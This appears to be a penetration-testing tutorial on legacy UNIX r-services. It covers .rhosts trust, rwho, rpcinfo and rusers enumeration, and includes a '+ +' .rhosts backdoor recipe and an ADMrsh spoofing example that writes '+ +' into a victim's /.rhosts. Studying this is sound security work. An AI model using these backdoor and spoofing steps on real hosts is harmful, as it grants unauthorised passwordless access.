Hacking UNIX R-Services

R-Services

Unix r-services are common to commercial platforms, including Solaris, HP-UX, and AIX. I have assembled a list from the /etc/services file as follows:

exec            512/tcp

login           513/tcp

shell           514/tcp

Each service runs using standard PAM username and password authentication, which is overridden by ~/.rhosts and /etc/hosts.equiv entries defining trusted hosts and usernames. Locally, you will find that on Unix-based systems, the exec service is in.rexecd, the login service is in.rlogind, and the shell service is in.rshd.

Directly Accessing R-Services

From a Unix-based platform, you use rsh, rlogin, and rexec clients to access the respective r-services running on a remote host. Example below shows how you can use each client from the command shell.

Solaris

# rsh

usage: rsh [-nd] [-l login] host [command]

# rlogin

usage: rlogin [ -8EL] [-e char] [ -l username ] host

# rexec

rexec: Require at least a host name and command.

Usage: rexec [ -abcdhns ] -l username -p password  host command

     -l username: Sets the login name for the remote host.

     -p password: Sets the password for the remote host.

     -n: Explicitly prompt for name and password.

     -a: Do not set up an auxiliary channel for standard error.

     -b: Use BSD-rsh type signal handling.

     -c: Do not close remote standard in when local input closes

     -d: Turn on debugging information.

     -h: Print this usage message.

     -s: Do not echo signals to the remote process.


Mac OSX



$ rsh
usage: rsh [-46dn] [-l username] [-t timeout] host [command]
Note: See that the rsh client might be incompatible in different systems

 Unix/Linux ~/.rhosts and /etc/hosts.equiv files

The .rhosts file is in the user home directory under Unix and contains a list of username and IP address or machine hostname pairs, such as the following:


Solaris misconfigured .rhosts file-

# pwd

/home/chris

# cat .rhosts

chris        mail.xmm.com

+     192.168.0.10

#

Linux misconfigured .rhosts file, allowing everything

# pwd

/home/root

# cat .rhosts

+ +

In this example, I can use any of the r-services (rsh, rlogin, or rexec) to connect to this host from mail.trustmatta.com if I am logged into the host as chris or from 192.168.0.10 with any username on that host.

When a user connects to the host running rshd (the remote shell daemon running on TCP port 514), the source IP address is cross-referenced against the .rhosts file, and the username is verified by querying the identd service running at the source. If these details are valid, direct access is given to the host without even requiring a password.

A simple, yet effective, backdoor for most Unix-based systems running rshd is to place an .rhosts file in the home directory of the bin user (/usr/bin/ under Solaris) containing the wildcards + +. 

Spoofing RSH Connections

If you are aware of trust between hosts, you can spoof RSH connections to appear as if they are from trusted hosts using IP sequence prediction and falsified client responses to match entries in .rhosts files server-side. One tool that can perform RSH spoofing and execute commands is ADMrsh, available from the ADM site (http://adm.freelsd.net/ADM/). The utility requires the latest version of ADMspoof, and its header files (found in ADM-spoof-NEW.tgz at the time of writing) and its usage is shown here:

                                 ADMrsh

                                 **==**



 It's very easy to use (like all the ADM products).



 ADMrsh [ips] [ipd] [ipl]  [luser] [ruser] [cmd]



 Parameters List :

 ips   =   ip source (ip of the trusted host)

 ipd   =   ip destination (ip of the victim)

 ipl   =   ip local (your ip to receive the informations)

 luser =   local user

 ruser =   remote user

 cmd   =   command to execute



 If ya don't understand, this is an example :



 ADMrsh a.foo.us b.foo.us bad.org root root "echo\"+ +\">/.rhosts"



 Credit's : Heike , ALL ADM CreW , !w00w00 , Darknet

 ADMrsh 0.5 pub (c) ADM  <-- hehe ;)


rwho

The "rwho" protocol provides a simple scheme for listing UNIX machines on the local segment, and who is logged onto those machines. Each UNIX host runs a daemon (usually "in.rwhod" or "rwhod") that both periodically broadcasts its information, as well as listens for other machine's broadcasts. Each machine then keeps a list of active machines and logged on users.

This presents a security risk for network managers, because it exposes machine names as well as user names. The 'rwhod' service should be disabled on secure machines.

When a user types the command "rwho" at the command line, they get a list that looks something like:

smaug           up 13 days, 21:49,    load average: 0.00, 0.00, 0.01
frodo             up 23 days, 10:23,    load average: 0.00, 0.01, 0.02

Note: The broadcast from each machine is a UDP packet sent to port 513.

Options

     -a      Report all users whether or not they have typed  to the system in the past hour.

Paths

     /var/spool/rwho/whod.*        

Note: Contains information   about    other machines

Notes

rwho does not work through gateways.The directory /var/spool/rwho must exist on  the  host  from which rwho is run. This service takes up progressively more network bandwith as the  number  of hosts on the local net increases. For large networks, the cost becomes prohibitive.

rusers

The Unix rusers service is a Remote Procedure Call (RPC) service that listens on a dynamic TCP port. The rusers client utility first connects to the RPC portmapper on TCP port 111, which returns the whereabouts of the rusersd service if it is active.

During initial TCP port scans, if the RPC portmapper service isn't found to be accessible, it is highly unlikely that rusersd will be accessible. If, however, TCP or UDP port 111 is found to be accessible, the rpcinfo client can check for the presence of rusersd and other accessible RPC services


# rpcinfo -p 192.168.0.9

100000   4    tcp  111   rpcbind 

100000   4    udp  111   rpcbind 

100024   1    udp  32772 status 

100024   1    tcp  32771 status 

100021   4    udp  4045  nlockmgr 

100021   2    tcp  4045  nlockmgr 

100005   1    udp  32781 mountd 

100005   1    tcp  32776 mountd 

100003   2    udp  2049  nfs 

100011   1    udp  32822 rquotad 

100002   2    udp  32823 rusersd 

100002   3    tcp  33180 rusersd

Note:If rusersd is running, you can probe the service with the rusers client (available on most Unix-based platforms) to retrieve a list of users logged into the system, as shown in Example 5-18.
# rusers -l 192.168.0.50
Sending broadcast for rusersd protocol version 3...

Sending broadcast for rusersd protocol version 2...

james    onyx:console            Mar  3 13:03   22:03

amber    onyx:ttyp1              Mar  2 07:40

chris    onyx:ttyp5              Mar  2 10:35      14

al       onyx:ttyp6              Mar  2 10:48

Man page


Synopsis

rusers [-al] [host ...]

Description

The rusers command produces output similar to who, but for the list of hosts or all machines on the local network. For each host responding to the rusers query, the hostname with the names of the users currently logged on is printed on each line. The rusers command will wait for one minute to catch late responders.
The following options are available:
      -a'        Print all machines responding even if no one is currentlylogged in.
-l' Print a long format listing. This includes the user name, host name, tty that the user is logged in to, the date and time the user logged in, the amount of time since the user typed on the keyboard, and the remote host they logged in from (if applicable).

Diagnostics

rusers: RPC: Program not registered
The rpc.rusersd(8) daemon has not been started on the remote host.rusers: RPC: Timed out
A communication error occurred. Either the network is excessively congested, or the rpc.rusersd(8) daemon has terminated on the remote host.
rusers: RPC: Port mapper failure - RPC: Timed out
The remote host is not running the portmapper (see portmap(8) ), and cannot accomodate any RPC-based services. The host may be down.

See Also

rwho(1) users(1), who(1), portmap(8), rpc.rusersd(8)

History

The rusers command appeared in SunOS.

References: